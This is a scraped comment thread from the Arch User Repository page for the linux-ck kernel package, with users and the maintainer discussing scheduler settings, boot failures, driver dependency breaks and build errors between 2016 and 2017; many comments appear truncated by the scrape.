commented on 2017-11-20 20:12 BFQ works for me with scsi_mod.use_blk_mq=1 elevator=bfq kernel options. francoism90 commented on 2017-11-04 21:28 @kwe: Do you have a source? We should try to keep the Wiki up-to-date, contributes are welcome. :) Terence commented on 2017-11-04 20:22 @kwe Thanks and sorry for the off-topic. kwe commented on 2017-11-04 20:20 Terence commented on 2017-11-04 20:14 @kwe Ok my bad, I forgot it's not deadline anymore but mk-deadline. Why is the wiki saying that I can't do that though? kwe commented on 2017-11-04 20:10 @Terence Deadline should be an option: $ cat /sys/block/sda/queue/scheduler mq-deadline kyber [bfq] none Terence commented on 2017-11-04 20:09 ? kwe commented on 2017-11-04 20:02 . Terence commented on 2017-11-04 19:58 "? kwe commented on 2017-11-04 18:59 Terence commented on 2017-11-04 18:52 I can't get BFQ to be enabled with the latest version. keepitsimpleengr commented on 2017-10-31 20:37 @graysky got it graysky commented on 2017-10-31 19:29 . mrkline commented on 2017-10-31 18:04 Apparently I'm blind and/or need more coffee. My apologies. sir_lucjan commented on 2017-10-31 17:49 ? mrkline commented on 2017-10-31 17:36 . keepitsimpleengr commented on 2017-10-31 16:51 :: nvidia-ck-k10: installing nvidia-utils (387.22-1) breaks dependency 'nvidia-utils=387.12' :: nvidia-ck-sandybridge: installing nvidia-utils (387.22-1) breaks dependency 'nvidia-utils=387.12' artafinde commented on 2017-10-31 11:04 @mrkline: This has been in discussion in forums official post: (read last two pages at least) sir_lucjan commented on 2017-10-31 10:59 @mrkline: You should read 'patch --help.' -R --reverse Assume patches were created with old and new files swapped. mrkline commented on 2017-10-31 00:45 ? timofonic commented on 2017-10-30 19:09. j1simon commented on 2017-10-24 06:59 I have a problem with 4.13.x. I have opened a bug because this occurs with all kernels 4.13.x that I've tested: stock, zen, ck. artafinde commented on 2017-10-23 09:09 @kyak: as mentioned [here], build yourself from aur [here]: kyak commented on 2017-10-23 08:44 Hi graysky, The virtualbox-ck-host-modules-ivybridge doesn't seem to exist anymore in repo-ck. Is it as intended, and if so, what is the suggested replacement? graysky commented on 2017-10-22 17:30. nTia89 commented on 2017-10-22 17:19 . Tjuh commented on 2017-10-22 17:17 Nice, thanks for that, most appreciated. FarStar commented on 2017-10-22 17:09 Tjuh commented on 2017-10-22 17:05 A bit confused, so how does one enable BFQ nowadays? Wiki says setting elevator=bfq as a kernel parameter does not work. graysky commented on 2017-10-22 16:28 @nTia89 and Tjuh - I believe that is the expected output, no? Tjuh commented on 2017-10-22 15:29 Same as nTia89. nTia89 commented on 2017-10-22 15:25 I get this, no kernel parameters or anything else (e.g udev rules): $ cat /sys/block/sda/queue/scheduler [mq-deadline] kyber bfq none graysky commented on 2017-10-22 13:46 Please try 4.13.9-1 which has a workaround incorporated. No special kernel parameters should be needed. Works for me without them. Feedback please! QuartzDragon commented on 2017-10-20 08:56. sir_lucjan commented on 2017-10-17 13:20 @zoidberg Could you read previous comments? zoidberg commented on 2017-10-17 13:17. artafinde commented on 2017-10-16 21:14 Works fine, good job both. (also nvidia-dkms works fine I blame my debug stripped package). graysky commented on 2017-10-16 20:03 It seems as though bfq is to blame. For me, booting elevator=cfq in the boot loader works as expected. Can others confirm? artafinde commented on 2017-10-16 18:33: nTia89 commented on 2017-10-16 17:52 Same here (not too old hardware, i5-5200U). Compiled with options: MNATIVE and X86_P6_NOP I attach a photo, maybe it can be useful: I have to say that respond to command: CTRL+ALT+CANC reboot the pc Saren commented on 2017-10-16 15:56 Can confirm it's not just you. I got kernel panic on boot graysky commented on 2017-10-16 13:40 I just pushed 4.13.7-1 but I am unable to boot after compiling on an admittedly old system. Requesting feedback from other users. zerophase commented on 2017-10-15 04:35 @ozmartian in /usr/lib/modules-load.d just comment out crypto_user in bluez.conf. I wasn't having issues with booting; the module just wouldn't load for me. ozmartian commented on 2017-10-14 22:14 ebulon commented on 2017-10-11 21:07 @zerophase: thanks, always interesting to hear experience from others. Hopefully the wait will not be too long. zerophase commented on 2017-10-09 18:57 For supporting journaled quotas is another switch needed to be turned on other than QFMT_V2? Switched it on, but still cannot mount my disk with usrjquota and grpjquota turned on. zerophase commented on 2017-10-06 18:56 . graysky commented on 2017-10-06 18:53 I emailed CK asking about the timelines for MuQSS for 4.13.x and he said 1-2 weeks. I also asked him to post a blog entry since others probably want to know too. zebulon commented on 2017-10-06 11:29 @zerophase: Con Klivas' blog and repository mention the latest patch for 4.12. We need to wait. What kind of issues do you have? zerophase commented on 2017-10-06 09:37 Has anyone heard from ck on 4.13 being released? Being on 4.12 still is starting to cause bugs with other arch packages. keepitsimpleengr commented on 2017-10-04 14:46 :: nvidia-ck-k10: installing nvidia-utils (387.12-1) breaks dependency 'nvidia-utils=384.90' keepitsimpleengr commented on 2017-09-28 15:12 nvidia-ck-sandybridge: installing nvidia-utils (384.90-1) breaks dependency 'nvidia-utils=384.69' willianholtz commented on 2017-09-23 22:17 Hello, I have the same SD card problem as the following link. If the SD is plugged in when starting the kernel, it simply hangs, if it is not plugged in, when entering the DE does not mount! graysky commented on 2017-09-23 17:49 That is to be expected with nvme. zerophase commented on 2017-09-23 17:20 Should bfq be the default scheduler without setting anything, now? Just noticed my nvme drive is running with none by default. Eschwartz commented on 2017-09-15 13:11? graysky commented on 2017-09-06 19:44 @archzz - please do not flag out of date until ck releases a patchset suitable for the 4.13.0 series. graysky commented on 2017-09-05 16:21 Due to x.69 being pushed to [extra]. Updated now. keepitsimpleengr commented on 2017-09-05 16:09 nvidia-ck-k10: installing nvidia-utils (384.69-1) breaks dependency 'nvidia-utils=384.59' hotty commented on 2017-08-26 16:05? Tharbad commented on 2017-08-22 19:00: vp1981 commented on 2017-08-22 12:21 ,. Tharbad commented on 2017-08-22 12:08 System freezes sometime during the graphical login. CPU is at 100%. ctrl+alt+F# and magic keys don't work. hotty commented on 2017-08-20 21:23 Still got a non-bootable kernel, both from here or from repo-ck freezes at boot since version 4.12.7. Normal arch kernel boots without any issues. Just a blinking cursor and after 2 minutes it shows "Triggering uevents" but thats it. graysky commented on 2017-08-17 19:13 I bumped to 4.12.8-1 but will hold on building for [repo-ck] until CK verifies the recent merges (github) will not be released to ck3 any time soon. mrkline commented on 2017-08-15 21:38 .) graysky commented on 2017-08-15 21:20 @mrkline - Interesting... I get the same. EDIT: mrkline commented on 2017-08-15 20:20 Scratch that, 4.12.7-2 seems to have the same issue. mrkline commented on 2017-08-15 18:40 Apparently ck-2 contains changes to make BFQ the default scheduler: So we should be good to go as soon as @graysky bumps this. vp1981 commented on 2017-08-15 12:32 " () mrkline commented on 2017-08-15 07:27 ? artafinde commented on 2017-08-15 06:49" pedrogabriel commented on 2017-08-15 02:03 4.12.7-1 works like a charm. kwe commented on 2017-08-14 19:58 . :) beest commented on 2017-08-14 19:25 4.12.7-1 boots, everything seems kosher so far. graysky commented on 2017-08-14 18:31 @zebulon - Please try 4.12.7-1 which contains a suggestion by CK to fix. Does it boot and run? I cannot build and test for some time. graysky commented on 2017-08-13 19:07 @amoka - There is not yet a stable ck1 patchset for 4.12. pedrogabriel commented on 2017-08-13 05:11 Got a non-bootable system too. zebulon commented on 2017-08-12 19:25 For your info, when you wait long enough, you get error messages: "systemd-udevd blocked for more than 120 seconds". post-factum commented on 2017-08-12 19:16 -ck is still buggy, unfortunately. I'd recommend downgrade for the time being. graysky commented on 2017-08-12 16:27 @zerophase - Yes, I too get a non-bootable. I emailed CK. @kwe - Agreed, thanks for pointing that out. Will be edited in the -3 release. kwe commented on 2017-08-12 16:09 zerophase commented on 2017-08-12 16:01 I just get a blinking cursor. zebulon commented on 2017-08-12 15:43 @graysky: unfortunately I cannot boot. It compiled fine (with Skylake optimisation) and seemed to install. But for the first time with the ck kernel, it hangs at the very beginning of the boot sequence. I can only see systemd version, then nothing happens. zebulon commented on 2017-08-12 15:27 @graysky: thanks. I was wondering why MuQSS had disappeared from config.i686. graysky commented on 2017-08-12 15:05 @zebulon - Fuck, you're correct. Fixed in 4.12.6-2 just now. zebulon commented on 2017-08-12 14:53 @graysky: thanks for maintaining this package. One thing I noticed: up to 4.11 it asked via a numbered menu for the kind of CPU optimisation the user wanted. This time it did not, is this normal? puithove commented on 2017-07-29 11:37 Looks like CK was busy for a while playing with his new Tesla :) Good for him. zerophase commented on 2017-07-28 19:31 4.12 is up on core. Are we waiting on the ck patch? JunioCalu commented on 2017-07-16 11:37 About P6_NOPS, should I enable it? graysky commented on 2017-07-13 22:34 @gnu - done, will be in the next update, thks beest commented on 2017-07-13 15:02 Just for the sake of pedantry, next release you may want to change the URL preceding _BFQ_enable_ to as the fragment in the original comment is dead and the linux-ck page links there now anyway. r08 commented on 2017-07-11 20:35 @QuartzDragon @artafinde Thanks for the feedback. I guess I'm not the only one... Will test this using CONFIG_HZ_PERIODIC=y to see if I get the same latency issues.. artafinde commented on 2017-07-09 07:17 ? QuartzDragon commented on 2017-07-08 22:38 When I change CONFIG_HZ to 1000, CONFIG_HZ_100_MUQSS seems to be automatically unset. artafinde commented on 2017-07-08 08:57 MuQSS 0.150 reverted the Hz back to 100Hz and I think that's the recommended value from ck. @QuartzDragon, r08 do you change both the below: CONFIG_HZ_100_MUQSS=y CONFIG_HZ=100 graysky commented on 2017-07-08 07:37 @Quartz and r08 - Post to ck's blog? QuartzDragon commented on 2017-07-08 06:54 In the past, I too had noticed weird stuttering using 100Hz, so now I always set it to 1000Hz. System is smooth. :) r08 commented on 2017-07-07 10:51 zerophase commented on 2017-07-05 22:23 Anyone else getting mce errors at boot, occasionally, on Haswell? I only get them when I hard reboot if the computer stalls after displaying time till next fsck. nTia89 commented on 2017-07-05 17:58 Have you read it? vp1981 commented on 2017-07-05 02:43 . SuperIce97 commented on 2017-07-04 21:57 ): j1simon commented on 2017-07-04 12:23 . sir_lucjan commented on 2017-06-27 10:14 @zhenyu: 1. gpg --receive-keys 79BE3E4300411886 38DBBDC86092693E 2. repo-ck.com, not ck-repo.com. zhenyu commented on 2017-06-27 03:30! graysky commented on 2017-06-23 21:30 wrote: "Please do not leave a comment containing the version number every time you update the package. This keeps the comment section usable for valuable content mentioned above." I will therefore stop commenting as I have :) francoism90 commented on 2017-06-16 17:23 vp1981 commented on 2017-06-12 11:26 graysky commented on 2017-06-11 19:30 Are you sure? On your kaby lake what is the output of: gcc -c -Q -march=native --help=target | grep 'march\|mtune' francoism90 commented on 2017-06-11 18:53 @SuperIce97: Ah thanks, I'll give it a try. :) SuperIce97 commented on 2017-06-11 18:38 @francoism90: Kaby Lake has an identical architecture to Skylake (they just improved the manufacturing process which simply allows for higher clock speeds), so you could just use use the Skylake optimized version. You could compile it with native optimizations. francoism90 commented on 2017-06-11 16:27 @graysky: thanks, will install generic instead. :) graysky commented on 2017-06-11 16:25 There is no KL support in gcc v7.1.1. francoism90 commented on 2017-06-11 16:21 Hi graysky, Thanks for providing the kernel and packages. :) Is it possible to add support for Kaby Lake? graysky commented on 2017-05-26 21:52 @mareexx and Davikar - Best to post to ck's blog as well since that is more or less the bug tracker for the patchset. mareex commented on 2017-05-26 21? Davikar commented on 2017-05-26 17:04: <IRQ> </IRQ> ]--- graysky commented on 2017-05-25 19:03 Bump to v4.11.3-1 Changelog: mrturcot commented on 2017-05-21 03:03 Thanks guys, I was able to upgrade with @grayskys instructions. Also duly noted @mrkline, cheers. mrkline commented on 2017-05-20 21:41 @mrturcot nvidia-dkms is also a viable option if you don't mind building it building the driver locally with each kernel update. graysky commented on 2017-05-20 13:54 Bump to v4.11.2-1 Changelog: graysky commented on 2017-05-20 10:24. mrturcot commented on 2017-05-20 10:16 graysky commented on 2017-05-20 09:51 @mrt - You built and installed linux-ck 4.11.1-2 and then were unable to build nvidia-ck? mrturcot commented on 2017-05-20 05:30 Hey getting error when updating with nvidia-ck installed... :: nvidia-ck: installing linux-ck (4.11.1-2) breaks dependency 'linux-ck<4.11' More info - Please help... i'm stuck thanks. graysky commented on 2017-05-20 01:37 Bump to v4.11.1-2 Changelog: fix pre-made config for cpu type Commit: graysky commented on 2017-05-20 01:26 @mrkline - It's not a dumb question at all. Mistake on my part. Fixed in 4.11.1-2. Thank you for the report. mrkline commented on 2017-05-20 00:18 . graysky commented on 2017-05-19 22:14. QuartzDragon commented on 2017-05-15 05:38 Do you have the PKGBUILD for 4.11 sitting around? Would love to test it. :) graysky commented on 2017-05-14 15:46 The major show stopper are the nvidia drivers at the moment. The kernel builds fine but I don't want mess up users of nvidia-xxx. hekel commented on 2017-05-14 14:49 @graysky I see, thanks. I've only recently started using your repo/pkgbuild again. I guess I spoiled myself by building my own asap for so long. graysky commented on 2017-05-14 14:19 @hekel - and see (threads titled Kernel 4.11 status). hekel commented on 2017-05-14 13:25? graysky commented on 2017-05-14 12:20 Bump to v4.10.16-1 Changelog: Commit: monotykamary commented on 2017-05-13 10:49 There is one for 340xx in the nvidia forums, but haven't found one for 304xx. graysky commented on 2017-05-12 21:59 Link to a patch for 304xx and 340xx? monotykamary commented on 2017-05-12 21:31 @graysky Gotcha. For dkms, virtualbox-host-dkms builds correctly here. nvidia-dkms requires a MODULE_LICENSE edit for nvidia-drm/nvidia-drm-linux.c. I have not tested broadcom. graysky commented on 2017-05-12 19:09 @monotykamary - Need to verify that all broadcom, nvidia-xxxx, and vbox modules build against 4.11.x before I bump it. keepitsimpleengr commented on 2017-05-11 14:32 nvidia-ck-sandybridge: installing nvidia-utils (381.22-1) breaks dependency 'nvidia-utils=378.13' graysky commented on 2017-05-08 18:31 Bump to v4.10.15-1 Changelog: Commit: graysky commented on 2017-05-03 18:03 Bump to v4.10.14-1 Changelog: Commit: graysky commented on 2017-04-27 19:12 Bump to v4.10.13-1 Changelog: Commit: graysky commented on 2017-04-21 22:17 Bump to v4.10.12-1 Changelog: Commit: artafinde commented on 2017-04-21 14:11 BFQ scheduled for mainline - yoohoo! graysky commented on 2017-04-18 07:26 Bump to v4.10.11-1 Changelog: Commit: kyak commented on 2017-04-14 05:29 Having some problems with Docker and Linux-ck, posted here: graysky commented on 2017-04-12 19:02 Bump to v4.10.10-1 Changelog: Commit: bacondropped commented on 2017-04-08 18:10 Hm, I'm getting an occasional "kernel bug" crash with BFQ enabled on a per-device basis (4.10.8 and 4.10.9 with NUMA enabled). I've disabled BFQ, let's see if it persists. graysky commented on 2017-04-08 11:21 Bump to v4.10.9-1 Changelog: Commit: sidro commented on 2017-04-07 18:06. SuperIce97 commented on 2017-04-07 18:03 @sidro: This is just how AUR/Arch packages work. There is no way to "fix" the package. It is expected that you import the gpg keys before you build the package. sir_lucjan commented on 2017-04-07 18:03 gpg --recv-keys 79BE3E4300411886 gpg --recv-keys 38DBBDC86092693E Code works fine. PEBKAC. sidro commented on 2017-04-07 18:00 Because original Build Script return errors. ==>. Fix your code.. sir_lucjan commented on 2017-04-07 17:04 @sidro: You're wrong. SuperIce97 commented on 2017-04-07 17:02 @sidro: How is it wrong? sidro commented on 2017-04-07 16:59 Greg Kroah-Hartman sign is wrong. Fix it. sir_lucjan commented on 2017-04-07 16:25 gpg --recv-keys 79BE3E4300411886 38DBBDC86092693 sidro commented on 2017-04-07 16:13 ==>. graysky commented on 2017-03-31 17:58 Bump to v4.10.8-1 Changelog: Commit: graysky commented on 2017-03-30 11:14 Bump to v4.10.7-1 Changelog: Commit: graysky commented on 2017-03-26 14:59 Bump to v4.10.6-1 Changelog: Commit: graysky commented on 2017-03-22 18:33 Bump to v4.10.5-1 Changelog: Commit: Manjaro won't boot with this kernel. In default, Kernel panic shows up. Adding this line into /boot/grub/grub.cfg: initrd /boot/initramfs-linux-ck-ivybridge.img kernel boots but cannot startx (with and without nvidia-ck-ivybridge) Anyone knows how to solve this issue? How to persistently enable bfq scheduler? I tried adding "elevator=bfq" in kernel parameter as suggested by Arch's wiki, but it didn't do anything. Thanks! Updates I just found out Antergos by default has a script trying to set scheduler in: /etc/udev/rules.d/60-schedulers.rules So I commented everything in that file and it's good now, nothing is wrong with linux-ck. I guess Antergos isn't real Arch, eh? :D is it possible to include this - - patch in the next PKGREL? It works for me and people on freedesktop.org bugtracker, so it should be just fine to include it. It's a cherry-pick from the in-development 4.11 kernel, and thus would be useless and safe to remove after you update the package to that version. - It's not in the official ARCH kernel either. I simply mirror ARCH's config (with the ck changes). The module has either been dropped upstream or we aren't configured to build it... you might wanna open up a flyspray against the kernel. When I look at the 4.9 -> 4.10 commit, I don't see that we dropped the config option containing 'serial' though: cooljay032 commented on 2017-02-28 20:19 seems the lirc_serial driver missing!?! -- Unit systemd-modules-load.service has begun starting up. Feb 28 21:07:41 vdr systemd-modules-load[801]: Inserted module 'acpi_cpufreq' Feb 28 21:07:41 vdr systemd-modules-load[801]: modprobe: ERROR: could not find module by name='lirc_serial' Feb 28 21:07:41 vdr systemd-modules-load[801]: modprobe: ERROR: could not insert 'lirc_serial': Unknown symbol in module, or unknown parameter (see dmesg) Feb 28 21:07:41 vdr systemd[1]: systemd-modules-load.service: Main process exited, code=exited, status=1/FAILURE Feb 28 21:07:41 vdr systemd[1]: Failed to start Load Kernel Modules. SuperIce97 commented on 2017-02-28 00:29 @mrkline That's a bit odd, yeah. nvidia-libgl is now on version 378.13-3 but nvidia-dkms is 378.13-2. You need 378.13-3 for Linux 4.10 support, so I wonder why they haven't pushed that dkms update yet. nvidia-dkms fails to build against 4.10.1-1. Is there a known workaround? Or do we now have to use nvidia-ck? (I've been using nvidia-dkms with linux-ck for quite a while without any trouble.) From the build log: CC [M] /var/lib/dkms/nvidia/378.13/build/nvidia/nv-vtophys.o /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c: In function ‘nvidia_cpu_callback’: /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:213:14: error: ‘CPU_DOWN_FAILED’ undeclared (first use in this function) case CPU_DOWN_FAILED: ^~~~~~~~~~~~~~~ /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:213:14: note: each undeclared identifier is reported only once for each function it appears in /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:220:14: error: ‘CPU_DOWN_PREPARE’ undeclared (first use in this function) case CPU_DOWN_PREPARE: ^~~~~~~~~~~~~~~~ In file included from /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:15:0: /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c: In function ‘nv_init_pat_support’: /var/lib/dkms/nvidia/378.13/build/common/inc/nv-linux.h:391:34: error: implicit declaration of function ‘register_cpu_notifier’ [-Werror=implicit-function-declaration] #define register_hotcpu_notifier register_cpu_notifier ^ /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:258:17: note: in expansion of macro ‘register_hotcpu_notifier’ if (register_hotcpu_notifier(&nv_hotcpu_nfb) != 0) ^~~~~~~~~~~~~~~~~~~~~~~~ /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c: In function ‘nv_teardown_pat_support’: /var/lib/dkms/nvidia/378.13/build/common/inc/nv-linux.h:388:36: error: implicit declaration of function ‘unregister_cpu_notifier’ [-Werror=implicit-function-declaration] #define unregister_hotcpu_notifier unregister_cpu_notifier ^ /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.c:283:9: note: in expansion of macro ‘unregister_hotcpu_notifier’ unregister_hotcpu_notifier(&nv_hotcpu_nfb); ^~~~~~~~~~~~~~~~~~~~~~~~~~ CC [M] /var/lib/dkms/nvidia/378.13/build/nvidia/os-interface.o cc1: some warnings being treated as errors make[2]: *** [scripts/Makefile.build:294: /var/lib/dkms/nvidia/378.13/build/nvidia/nv-pat.o] Error 1 make[2]: *** Waiting for unfinished jobs.... make[1]: *** [Makefile:1494: _module_/var/lib/dkms/nvidia/378.13/build] Error 2 make[1]: Leaving directory '/usr/lib/modules/4.10.1-1-ck/build' make: *** [Makefile:81: modules] Error 2 It seems that virtualbox-ck-host-modules-ivybridge requires rebuild: Failed to insert 'vboxnetadp': Invalid argument Failed to insert 'vboxnetflt': Invalid argument Failed to insert 'vboxnetadp': Invalid argument Failed to insert 'vboxnetflt': Invalid argument Kernel 4.9.11-1-ck-ivybridge from repo-ck. Here's a working PKGBUILD for 4.10: Updated versioning, commented out the upstream patches, commented out the console loglevel patch (implemented now; I got this option presented to me pre-nconfig). Edit: The loglevel option is now available in nconfig under Kernel Hacking Edit 2: I also had to comment out the fpu patch on my setup. If you do this, don't forget to comment it out in the sources and prepare sections. Currently writing this from 4.10.0-1-ck, no issues. @artafinde I've run cd ~/.cache/pacaur/linux-ck/src/linux-4.9 make clean #I also tried make mrproper (used in the PKGBUILD) and make distclean I also tried pacaur -Sc to see if that did anything to help. As far as I can tell skimming over the PKGBUILD, in the prepare() step make mrproper comes after the initial patching and should clean the build environment. Oddly enough I had no issues upgrading linux-ck on my laptop, but on my desktop it's having trouble with the prepare() step for some reason. It might be because I upgraded pacaur before upgrading linux-ck and there is a change in PKGBUILD syntax/formatting or something else. On my laptop I'm pretty sure I upgraded linux-ck and pacaur at the same time, which means the previous version of pacaur handled the installation. That's all I can think of that's different. I'm getting a couple of errors in the prepare() step: The next patch would create the file arch/x86/include/asm/asm-prototypes.h, which already exists! Assume -R? [n] The next patch would create the file include/asm-generic/asm-prototypes.h, which already exists! Assume -R? [n] I keep getting a failure occurring in prepare() regardless if I answer 'y' or 'n' to the question and to the "Apply anyway? [n]" question. I've started with a fresh download of everything by deleting the ~/.cache/pacaur/linux-ck/ folder. I've had pacaur redownload everything using this method a few times and the failure persists. @walkingrobot thanks. I turned the SCSI one on, and I noticed I was able to boot successfully once in a bluemoon without udev compiled into my initramfs. Do you know if there is currently a way to boot without udev, and an nvme drive in the pcie slot? @zerophase Here are the NVME options I have. CONFIG_NVME_CORE=m << this one is missing from your list CONFIG_BLK_DEV_NVME=m # CONFIG_BLK_DEV_NVME_SCSI is not set CONFIG_NVME_FABRICS=m CONFIG_NVME_RDMA=m CONFIG_NVME_TARGET=m CONFIG_NVME_TARGET_LOOP=m CONFIG_NVME_TARGET_RDMA=m CONFIG_NVMEM=m Does anyone know which NVME switches I should turn on in the kernel? I turned on CONFIG_BLK_DEV_NVME, and CONFIG_NVME_TARGET. I just left NVME_TARGET_LOOP, and CONFIG_BLK_DEV_NVME_SCSI off. Are there any other NVME settings I should turn on? With linux-ck-core2 4.9.3-1 and nvidia-340xx-ck-core2 340.101-3 I cannot start the X server. I get an error "Error: driver Nvidia is already registered. Aborting". No problem for me to stay with linux 4.8, this is just a warning for those wishing to upgrade. Both of my two machines failed in compiling Linux-ck 4.9.3 with GCC 6.3.1. Anyone got the same issue? <-Log Start--------------> LD fs/built-in.o ==> ERROR: A failure occurred in build(). Aborting... ==> ERROR: Makepkg was unable to build linux-ck. ==> Restart building linux-ck ? [y/N] ==> --------------------------------- ==> <-Log End-------------> SanskritFritz commented on 2017-01-13 21:55 Users of nvidia-304xx have held back the last version anyway since current version doesn't work at all :D graysky commented on 2017-01-13 21:47 Bump to v4.9.3-1 Changelog: Commit: Linux changes: Notes: Users of nvidia-304xx will have to pull the corresponding utils package from [testing] until 4.9 is pushed into [core]. Sorry about the inconvenience but way more users of linux-ck want the 4.9 series kernel and I didn't want to hold it up any longer. I have created my own package from this (forked basically) adding support for Reiser4 and with a config optimized solely for the Dell XPS 9550 laptops (in its various configurations). If its OK for you I'd like to name this Linux-CK-Reiser4 but with clear text that this is not made by you (in case shit hits the fan) but you will ofcourse gain the credit for the inital package the fork is based on. So Im basically using your PKGBUILD but with other options, the same patches but with a couple ones added, and grouped as ck-skylake to support your pre-compiled modules at repo-ck. Is this OK? graysky commented on 2016-12-22 19:02 I updated linux-ck and all its daughter packages (broadcom-ck nvidia-x-ck, and virtualbox-ck) but currently nvidia 304xx doens't build without an update to 304.134 and currently nvidia-304xx-utils in [extra] is stuck on 304.132. This means I can't push the 4.9 update until our devs put 304.134 in the repos. graysky commented on 2016-12-22 08:38 @BS - Yes, I saw it. Just need to verify that all modules build ok. Stay tuned. BS86 commented on 2016-12-22 07:29 4.8.15-2 fails because it's trying to call /bin/sh during the build: Cyclomatic Complexity 2 sound/core/hwdep.c:snd_hwdep_proc_read Cyclomatic Complexity 1 sound/core/hwdep.c:alsa_hwdep_init Cyclomatic Complexity 1 sound/core/hwdep.c:alsa_hwdep_exit make[2]: /bin/sh: Command not found make[2]: *** [scripts/Makefile.build:427: sound/core/snd-hwdep.o] Error 127 make[1]: *** [scripts/Makefile.build:440: sound/core] Error 2 make: *** [Makefile:974: sound] Error 2 ==> ERROR: A failure occurred in build(). Aborting... blitz commented on 2016-12-18 23:07 @graysky - Kernel config allows for menu driven cpu arch selection with minimal interaction and pre-selected MNATIVE. (taken from own PKGBUILD) _CPU_NATIVE=y ... ### Optionally set processor type for kernel if [ -n "${_CPU_NATIVE}" ]; then msg "Setting cpu arch to gcc native..." if [ "${CARCH}" = "x86_64" ]; then sed -i -e 's/^CONFIG_GENERIC_CPU=y/# CONFIG_GENERIC_CPU is not set/' \ -i -e 's/^# CONFIG_MNATIVE is not set/CONFIG_MNATIVE=y/' ./.config else sed -i -e 's/^CONFIG_M686=y/# CONFIG_M686 is not set/' \ -i -e 's/^# CONFIG_MNATIVE is not set/CONFIG_MNATIVE=y/' ./.config fi fi - The menu is quite nice! Hopefully I can stop messing around in nconfig soon. On that note, is it possible to automate the selection? I tried adding a `CONFIG_MNATIVE=y` line to config.x86_64, but I was still prompted when I ran makepkg. Also, enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz needs its SHA updated. yes, missing of optimizations without -march=native is my worry! (I know, this seems false but it is true...) hence, any modification is welcome, even if this mean to press some key my doubt is another: who builds this package from AUR, I imagine, wants the best optimizations overall, so, why "-march=native" is not the default choice? A modification I am considering is to have the AUR package provide unmodified config files for x86_64 and for i686 with respect to the gcc patch. What this means is that whenever you build linux-ck yourself, makepkg (or am I assuming your AUR helper) will pause and wait for you to select from the list of CPU optimizations (with default being a simple enter key). This will circumvent the need to modify the PKGBUILD enabled the nconfig option, and subsequent poking around in the nconfig itself. Potentially way faster and easier for the user. 1) How do people feel about this? 2) Will the added interactivity break AUR helpers (I am a pure makepkg person myself)? Example output: % makepkg -src ==> Making package: linux-ck 4.8.15-2 (Sun Dec 18 05:42:02 EST 2016) ... Processor family 1. AMD Opteron/Athlon64/Hammer/K8 (MK8) 2. AMD Opteron/Athlon64/Hammer/K8 with SSE3 (MK8SSE3) (NEW) 3. AMD 61xx/7x50/PhenomX3/X4/II/K10 (MK10) (NEW) 4. AMD Barcelona (MBARCELONA) (NEW) 5. AMD Bobcat (MBOBCAT) (NEW) 6. AMD Bulldozer (MBULLDOZER) (NEW) 7. AMD Piledriver (MPILEDRIVER) (NEW) 8. AMD Steamroller (MSTEAMROLLER) (NEW) 9. AMD Jaguar (MJAGUAR) (NEW) 10. Intel P4 / older Netburst based Xeon (MPSC) 11. Intel Atom (MATOM) 12. Intel Core 2 (MCORE2) 13. Intel Nehalem (MNEHALEM) (NEW) 14. Intel Westmere (MWESTMERE) (NEW) 15. Intel Silvermont (MSILVERMONT) (NEW) 16. Intel Sandy Bridge (MSANDYBRIDGE) (NEW) 17. Intel Ivy Bridge (MIVYBRIDGE) (NEW) 18. Intel Haswell (MHASWELL) (NEW) 19. Intel Broadwell (MBROADWELL) (NEW) 20. Intel Skylake (MSKYLAKE) (NEW) > 21. Generic-x86-64 (GENERIC_CPU) 22. Native optimizations autodetected by GCC (MNATIVE) (NEW) choice[1-22?]: graysky commented on 2016-12-18 10:07 @SuperIce97 @mrkline - Good points about usability and about niche population with aged hardware. I reverted the commit removing native updating 4.8.15-2 without bumping the pkgver since I don't want to rebuild for [repo-ck] since this change has 0 impact to the repo packages. QuartzDragon commented on 2016-12-18 06:20 @mrkline @SuperIce97 Also agreed! :) mrkline commented on 2016-12-18 05:29 +1 for bringing back `-march=native`. If you look at what flags are actually passed to the actual compiler (cc1), it provides much more machine-specific information (e.g., cache size, etc.) than `-march=<CPU family>`. As other users have suggested, it seems like there are workarounds for CPUs where it caused trouble. Even if workarounds don't exist, why remove the option from *all* users for the sake of a minority? A simple warning to avoid the flag for the few setups where it causes trouble should suffice. SuperIce97 commented on 2016-12-17 21:02 Is there anything wrong with the version of your patch before the last commit that removed the native option? If you choose native, it automatically gives you the option for P6 NOPS but it's disabled by default. I think that's a pretty safe way to do it. The help message also has the pretty straightforward message of "Say Y if you have Intel CPU newer than Pentium Pro, N otherwise." at the end, so I believe that anyone who enables Native optimizations would know what to do there. For the issue with Atom CPUs having issues when set to native, you could just add "[causes issues on some Atom CPUs]" to the name of the native option. I don't think this needs to be too complex. graysky commented on 2016-12-17 19:57 @SuperIce97 - I am not skilled enough to implement the logic for the X86_P6_NOP needed. While true that the native option may pass more tokens to make, if you look at the unpatched Makefile for a selection of core2, they are merely passing march=core2 option[1]. 1. SuperIce97 commented on 2016-12-17 19:53 Also, I noticed that on my SandyBridge laptop, march=native enables a ton more instructions than march=sandybrdige (my CPU is a 2630QM which is a SandyBridge). That means that we are not getting the full potential by specifying an arch vs native arch SuperIce97 commented on 2016-12-17 19:40 Looking at issue #17 on the gcc patch's github page though, I don't think it would be that difficult to enable native optimizations and just have a X86_P6_NOP as an additional option like tpruzina suggested. The reason I prefer using native instead of the specific arch is because some lower end CPUs (at least with Intel) don't seem to actually support every instruction of their arch for some reason. I used to have a Chromebook C720 with the Haswell Celeron 2955u (I now have a C740 with a Broadwell Celeron 3205u) and I was using the Haswell kernel until it decided that it wouldn't boot (not sure if a change in the kernel or gcc caused it; it was a long time ago and I was too lazy to hunt down the issue) if I compiled it with Haswell. With native on the other hand, the kernel worked just fine. Would it be possible to reimplement march=native but have the extra configurable as suggested by tpruzina? @Rainmaker - I like to use the official PKGBUILD as a template for this one since it minimizes both the chance of errors and my time to keep it in sync. Plus, I think many might not want to have the extra bulk of the headers package since it's only really needed to build modules. Not sure what you mean by split out the config. @BSB6 